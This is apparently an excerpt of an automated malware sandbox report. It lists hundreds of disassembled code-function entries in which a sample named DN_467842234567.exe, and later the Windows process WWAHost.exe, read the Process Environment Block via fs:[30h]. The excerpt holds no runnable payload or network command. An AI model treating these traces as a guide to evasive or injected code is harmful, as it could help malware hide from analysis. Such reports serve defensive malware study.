Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C38DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C0A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03915BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03888EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03878E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03863A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03883D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03867D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_039014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]
